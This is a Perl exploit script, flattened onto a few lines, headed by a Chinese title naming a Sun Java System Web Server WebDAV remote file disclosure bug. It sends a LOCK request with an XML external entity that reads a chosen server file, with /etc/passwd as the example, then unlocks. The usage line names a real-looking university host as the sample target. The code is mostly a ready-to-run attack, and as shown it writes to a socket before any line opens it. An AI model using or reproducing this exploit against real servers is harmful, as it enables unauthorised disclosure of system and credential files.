Sun Java System Web Server WebDAV请求远程文件泄露漏洞

#!/usr/bin/perl # aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !! # MAY/2010 # VERY THANKS TO LSD # # # oO VERiFIED oN Oo # # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10] # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE] # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX use IO::Socket; use MIME::Base64; print "//Sun Microsystems Sun Java System Web Server\n"; print "//Remote File Disclosure Exploit\n"; print "//by Kingcope\n"; print "May/2010\n"; if ($#ARGV != 2) { print "usage: perl sun.pl <target> <webdav directory> <file to get>\n"; print "sample: perl sun.pl lib7.berkeley.edu /dav /etc/passwd\n"; exit; } $target = $ARGV[0]; $|=1; $remotefile = $ARGV[2]; $folder = $ARGV[1]; $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print $sock "LOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Depth: 0\r\n". "Connection: close\r\n". "Content-Type: application/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n". $KRADXmL; $locktoken = ""; while(<$sock>) { if ($_ =~ /^Lock-token:\s(.*)?\r/) { $locktoken = $1; chomp $locktoken; } print; } close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '8080', Proto => 'tcp'); print $sock "UNLOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Connection: close\r\n". "Lock-token: $locktoken\r\n\r\n"; while(<$sock>) { print; } close($sock);